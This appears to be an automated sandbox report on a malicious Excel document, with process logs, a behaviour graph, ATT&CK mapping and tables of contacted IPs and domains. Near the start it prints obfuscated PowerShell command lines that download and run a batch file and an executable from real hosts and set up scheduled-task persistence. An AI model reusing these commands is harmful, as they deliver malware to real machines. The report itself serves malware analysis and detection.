        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/4jsSu5Q','pd.bat')
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 18,1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://speed-bg.com/kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe',($env:appdata)+'\sb.exe');Start-Sleep 2; Start-Process $env:appdata\sb.exe;'
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://speed-bg.com/kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe',($env:appdata)+'\sb.exe');Start-Sleep 2; Start-Process $env:appdata\sb.exe;
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\sb.exe 'C:\Users\user\AppData\Roaming\sb.exe'
        Source: C:\Users\user\AppData\Roaming\sb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\axoikBEWgDCn' /XML 'C:\Users\user\AppData\Local\Temp\tmp8C58.tmp'
        Source: C:\Users\user\AppData\Roaming\sb.exeProcess created: C:\Users\user\AppData\Roaming\sb.exe {path}

        Language, Device and Operating System Detection:

        barindex
        Yara detected Obfuscated PowershellShow sources
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: Yara matchFile source: C:\Users\user\Documents\pd.bat, type: DROPPED
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 27_2_0040EA7D cpuid
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: GetLocaleInfoW,
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: ___crtGetLocaleInfoEx,
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 27_2_006A23D1 GetSystemTimeAsFileTime,
        Source: C:\Users\user\AppData\Roaming\sb.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
        Source: powershell.exe, 00000007.00000002.2107902230.00000000000EE000.00000004.00000020.sdmpBinary or memory string: Sched.exe
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents
        Source: C:\Windows\System32\attrib.exeDirectory queried: C:\Users\user\Documents
        Source: C:\Windows\System32\attrib.exeDirectory queried: C:\Users\user\Documents
        Source: C:\Windows\System32\cmd.exeDirectory queried: C:\Users\user\Documents
        Source: C:\Windows\System32\cmd.exeDirectory queried: C:\Users\user\Documents

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsScripting311DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools11Input Capture1System Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsNative API1Scheduled Task/Job1Process Injection111Deobfuscate/Decode Files or Information11LSASS MemoryFile and Directory Discovery13Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsExploitation for Client Execution13Logon Script (Windows)Scheduled Task/Job1Scripting311Security Account ManagerSystem Information Discovery35SMB/Windows Admin SharesInput Capture1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsCommand and Scripting Interpreter13Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
        Cloud AccountsScheduled Task/Job1Network Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsSecurity Software Discovery331SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol13Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaPowerShell2Rc.commonRc.commonMasquerading1Cached Domain CredentialsVirtualization/Sandbox Evasion13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion13DCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection111Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 336052 Sample: spetsifikatsiya.xls Startdate: 05/01/2021 Architecture: WINDOWS Score: 100 81 Malicious sample detected (through community Yara rule) 2->81 83 Sigma detected: Scheduled temp file as task from temp location 2->83 85 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->85 87 10 other signatures 2->87 12 EXCEL.EXE 86 27 2->12         started        process3 signatures4 103 Obfuscated command line found 12->103 105 Document exploit detected (process start blacklist hit) 12->105 15 cmd.exe 12->15         started        17 cmd.exe 12->17         started        20 cmd.exe 12->20         started        22 2 other processes 12->22 process5 signatures6 24 powershell.exe 7 15->24         started        79 Obfuscated command line found 17->79 26 powershell.exe 16 10 17->26         started        30 powershell.exe 6 20->30         started        33 powershell.exe 7 22->33         started        35 powershell.exe 7 22->35         started        process7 dnsIp8 37 cmd.exe 24->37         started        75 cutt.ly 104.22.0.232, 443, 49167 CLOUDFLARENETUS United States 26->75 77 37.46.150.139, 49169, 80 IWAYCH Moldova Republic of 26->77 69 C:\Users\user\Documents\pd.bat, ASCII 26->69 dropped 107 Powershell drops PE file 30->107 40 attrib.exe 33->40         started        file9 signatures10 process11 signatures12 89 Obfuscated command line found 37->89 42 cmd.exe 37->42         started        45 cmd.exe 37->45         started        47 mode.com 37->47         started        process13 signatures14 97 Suspicious powershell command line found 42->97 99 Tries to download and execute files (via powershell) 42->99 49 powershell.exe 8 42->49         started        process15 dnsIp16 71 speed-bg.com 79.124.76.20, 49170, 80 TELEPOINTBG Bulgaria 49->71 63 C:\Users\user\AppData\Roaming\sb.exe, PE32 49->63 dropped 53 sb.exe 1 10 49->53         started        file17 process18 file19 65 C:\Users\user\AppData\...\axoikBEWgDCn.exe, PE32 53->65 dropped 67 C:\Users\user\AppData\Local\...\tmp8C58.tmp, XML 53->67 dropped 91 Machine Learning detection for dropped file 53->91 93 Injects a PE file into a foreign processes 53->93 95 Contains functionality to hide a thread from the debugger 53->95 57 sb.exe 1 53->57         started        61 schtasks.exe 53->61         started        signatures20 process21 dnsIp22 73 185.157.162.81, 1973, 49171, 49172 OBE-EUROPEObenetworkEuropeSE Sweden 57->73 101 Hides threads from debuggers 57->101 signatures23

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        spetsifikatsiya.xls5%VirustotalBrowse

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Roaming\axoikBEWgDCn.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Roaming\sb.exe100%Joe Sandbox ML

        Unpacked PE Files

        No Antivirus matches

        Domains

        SourceDetectionScannerLabelLink
        cutt.ly0%VirustotalBrowse
        speed-bg.com0%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://37.46.150.139/bat/scriptxls_687c7069-ef4b-4efe-b745-594285a9a92b_mic2_wddisabler.bat0%Avira URL Cloudsafe
        http://www.%s.comPA0%URL Reputationsafe
        http://www.%s.comPA0%URL Reputationsafe
        http://www.%s.comPA0%URL Reputationsafe
        http://www.%s.comPA0%URL Reputationsafe
        http://speed-bg.com/kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        cutt.ly
        104.22.0.232
        truetrueunknown
        speed-bg.com
        79.124.76.20
        truetrueunknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://37.46.150.139/bat/scriptxls_687c7069-ef4b-4efe-b745-594285a9a92b_mic2_wddisabler.batfalse
        • Avira URL Cloud: safe
        unknown
        http://speed-bg.com/kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exetrue
        • Avira URL Cloud: safe
        unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://www.piriform.com/ccleanerpowershell.exe, 00000007.00000002.2107902230.00000000000EE000.00000004.00000020.sdmp, powershell.exe, 0000000A.00000002.2128348191.000000000037E000.00000004.00000020.sdmp, powershell.exe, 0000000E.00000002.2106136798.00000000000DE000.00000004.00000020.sdmp, powershell.exe, 00000010.00000002.2157320922.000000000032E000.00000004.00000020.sdmpfalse
          high
          http://www.%s.comPApowershell.exe, 00000007.00000002.2110085564.0000000002420000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2129560236.0000000002450000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2106880201.0000000002390000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2157964975.0000000002360000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          low
          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000007.00000002.2110085564.0000000002420000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2129560236.0000000002450000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2106880201.0000000002390000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2157964975.0000000002360000.00000002.00000001.sdmpfalse
            high
            http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleaner7powershell.exe, 00000010.00000002.2157320922.000000000032E000.00000004.00000020.sdmpfalse
              high
              http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000007.00000002.2107902230.00000000000EE000.00000004.00000020.sdmpfalse
                high
                http://www.piriform.com/ccleanervpowershell.exe, 0000000A.00000002.2128348191.000000000037E000.00000004.00000020.sdmpfalse
                  high
                  http://www.piriform.com/ccleanerhttp://www.piriform.cpowershell.exe, 0000000E.00000002.2106136798.00000000000DE000.00000004.00000020.sdmpfalse
                    high
                    http://www.piriform.com/ccpowershell.exe, 0000000A.00000002.2128348191.000000000037E000.00000004.00000020.sdmpfalse
                      high
                      https://curl.haxx.se/docs/http-cookies.htmlsb.exefalse
                        high
                        http://www.piriform.com/powershell.exe, 0000000A.00000002.2128348191.000000000037E000.00000004.00000020.sdmpfalse
                          high

                          Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public

                          IPDomainCountryFlagASNASN NameMalicious
                          185.157.162.81
                          unknownSweden
                          197595OBE-EUROPEObenetworkEuropeSEfalse
                          79.124.76.20
                          unknownBulgaria
                          31083TELEPOINTBGtrue
                          104.22.0.232
                          unknownUnited States
                          13335CLOUDFLARENETUStrue
                          37.46.150.139
                          unknownMoldova Republic of
                          8758IWAYCHfalse

                          General Information

                          Joe Sandbox Version:31.0.0 Red Diamond
                          Analysis ID:336052
                          Start date:05.01.2021
                          Start time:10:05:33
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 10m 29s
                          Hypervisor based Inspection enabled:false
                          Report type:light
                          Sample file name:spetsifikatsiya.xls
                          Cookbook file name:defaultwindowsofficecookbook.jbs
                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                          Number of analysed new started processes analysed:29
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.expl.evad.winXLS@40/19@2/4
                          EGA Information:Failed
                          HDC Information:
                          • Successful, ratio: 0.5% (good quality ratio 0.5%)
                          • Quality average: 55.8%
                          • Quality standard deviation: 26.6%
                          HCA Information:
                          • Successful, ratio: 66%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Adjust boot time
                          • Enable AMSI
                          • Found application associated with file extension: .xls
                          • Changed system and user locale, location and keyboard layout to French - France
                          • Found Word or Excel or PowerPoint or XPS Viewer
                          • Attach to Office via COM
                          • Scroll down
                          • Close Viewer
                          Warnings:
                          Show All
                          • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
                          • TCP Packets have been reduced to 100
                          • Excluded IPs from analysis (whitelisted): 8.248.137.254, 8.248.135.254, 67.26.83.254, 8.253.95.249, 8.248.147.254
                          • Excluded domains from analysis (whitelisted): audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtCreateFile calls found.
                          • Report size getting too big, too many NtEnumerateValueKey calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          10:06:46API Interceptor459x Sleep call for process: powershell.exe modified
                          10:07:06API Interceptor991x Sleep call for process: sb.exe modified
                          10:07:44API Interceptor1x Sleep call for process: schtasks.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          185.157.162.81ptoovvKZ80.exeGet hashmaliciousBrowse
                            spetsifikatsiya.xlsGet hashmaliciousBrowse
                              EnJsj6nuD4.exeGet hashmaliciousBrowse
                                zlkcd7HSQp.exeGet hashmaliciousBrowse
                                  machine.xlsGet hashmaliciousBrowse
                                    qdnLoWn1E8.exeGet hashmaliciousBrowse
                                      ogYg79jWpR.exeGet hashmaliciousBrowse
                                        ORDER PMX-PT-2001 STOCK+NOVO.exeGet hashmaliciousBrowse
                                          DHL_10177_R293_DOCUMENT.exeGet hashmaliciousBrowse
                                            Order_List_PO# 081928.pdf.exeGet hashmaliciousBrowse
                                              CF09550WJ901.pdf.exeGet hashmaliciousBrowse
                                                Order List PO# 081927.pdf.exeGet hashmaliciousBrowse
                                                  Doc#662020094753525765301499.pdf.exeGet hashmaliciousBrowse
                                                    Doc#6620200947535257653014.pdf.exeGet hashmaliciousBrowse
                                                      Doc#66202009475352576530141.pdf.exeGet hashmaliciousBrowse
                                                        Doc#66202009475352576503588.pdf.exeGet hashmaliciousBrowse
                                                          79.124.76.20spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                          • speed-bg.com/kapa2/ferrazio/typla/jbm/GWqhcX68z24xeAO.exe
                                                          104.22.0.232sample products trade reference.docxGet hashmaliciousBrowse
                                                          • cutt.ly/
                                                          Request_for_Quotation.xlsmGet hashmaliciousBrowse
                                                          • cutt.ly/gdvAeui

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          speed-bg.comspetsifikatsiya.xlsGet hashmaliciousBrowse
                                                          • 79.124.76.20
                                                          cutt.ly1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xlsGet hashmaliciousBrowse
                                                          • 172.67.8.238
                                                          spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                          • 104.22.1.232
                                                          New Avinode Plans and Prices 2021.xlsGet hashmaliciousBrowse
                                                          • 172.67.8.238
                                                          spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                          • 104.22.0.232
                                                          spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                          • 172.67.8.238
                                                          AdviceSlip.xlsGet hashmaliciousBrowse
                                                          • 104.22.0.232
                                                          file.xlsGet hashmaliciousBrowse
                                                          • 104.22.1.232
                                                          file.xlsGet hashmaliciousBrowse
                                                          • 172.67.8.238
                                                          file.xlsGet hashmaliciousBrowse
                                                          • 172.67.8.238
                                                          output.xlsGet hashmaliciousBrowse
                                                          • 172.67.8.238
                                                          SecuriteInfo.com.Heur.20246.xlsGet hashmaliciousBrowse
                                                          • 172.67.8.238
                                                          SecuriteInfo.com.Exploit.Siggen3.5270.27062.xlsGet hashmaliciousBrowse
                                                          • 104.22.1.232
                                                          SecuriteInfo.com.Exploit.Siggen3.5270.27062.xlsGet hashmaliciousBrowse
                                                          • 104.22.0.232
                                                          30689741.xlsGet hashmaliciousBrowse
                                                          • 172.67.8.238
                                                          95773220855.xlsGet hashmaliciousBrowse
                                                          • 104.22.1.232
                                                          95773220855.xlsGet hashmaliciousBrowse
                                                          • 172.67.8.238
                                                          MT-000137.xlsGet hashmaliciousBrowse
                                                          • 172.67.8.238
                                                          95773220855.xlsGet hashmaliciousBrowse
                                                          • 104.22.0.232
                                                          MT-000137.xlsGet hashmaliciousBrowse
                                                          • 104.22.1.232
                                                          MT-000137.xlsGet hashmaliciousBrowse
                                                          • 104.22.0.232

                                                          ASN

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          TELEPOINTBGspetsifikatsiya.xlsGet hashmaliciousBrowse
                                                          • 79.124.76.20
                                                          document-1932597637.xlsGet hashmaliciousBrowse
                                                          • 217.174.152.52
                                                          document-1932597637.xlsGet hashmaliciousBrowse
                                                          • 217.174.152.52
                                                          document-1961450761.xlsGet hashmaliciousBrowse
                                                          • 217.174.152.52
                                                          document-1909441643.xlsGet hashmaliciousBrowse
                                                          • 217.174.152.52
                                                          document-1961450761.xlsGet hashmaliciousBrowse
                                                          • 217.174.152.52
                                                          document-1909441643.xlsGet hashmaliciousBrowse
                                                          • 217.174.152.52
                                                          document-1942925331.xlsGet hashmaliciousBrowse
                                                          • 217.174.152.52
                                                          document-1942925331.xlsGet hashmaliciousBrowse
                                                          • 217.174.152.52
                                                          document-1892683183.xlsGet hashmaliciousBrowse
                                                          • 217.174.152.52
                                                          document-1892683183.xlsGet hashmaliciousBrowse
                                                          • 217.174.152.52
                                                          document-1909894964.xlsGet hashmaliciousBrowse
                                                          • 217.174.152.52
                                                          document-1909894964.xlsGet hashmaliciousBrowse
                                                          • 217.174.152.52
                                                          document-1965918496.xlsGet hashmaliciousBrowse
                                                          • 217.174.152.52
                                                          document-1965918496.xlsGet hashmaliciousBrowse
                                                          • 217.174.152.52
                                                          document-1901557343.xlsGet hashmaliciousBrowse
                                                          • 217.174.152.52
                                                          document-1901557343.xlsGet hashmaliciousBrowse
                                                          • 217.174.152.52
                                                          document-1958527977.xlsGet hashmaliciousBrowse
                                                          • 217.174.152.52
                                                          document-1958527977.xlsGet hashmaliciousBrowse
                                                          • 217.174.152.52
                                                          document-1840475437.xlsGet hashmaliciousBrowse
                                                          • 217.174.152.52
                                                          OBE-EUROPEObenetworkEuropeSEptoovvKZ80.exeGet hashmaliciousBrowse
                                                          • 185.157.162.81
                                                          spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                          • 185.157.162.81
                                                          EnJsj6nuD4.exeGet hashmaliciousBrowse
                                                          • 185.157.162.81
                                                          AdviceSlip.xlsGet hashmaliciousBrowse
                                                          • 217.64.149.169
                                                          DHL_file 187652345643476245.exeGet hashmaliciousBrowse
                                                          • 185.157.160.233
                                                          DHL_file 187652345643476245.exeGet hashmaliciousBrowse
                                                          • 185.157.160.233
                                                          DHL_file 187652345643476245.exeGet hashmaliciousBrowse
                                                          • 185.157.160.233
                                                          DHL_file 187652345643476245.exeGet hashmaliciousBrowse
                                                          • 185.157.160.233
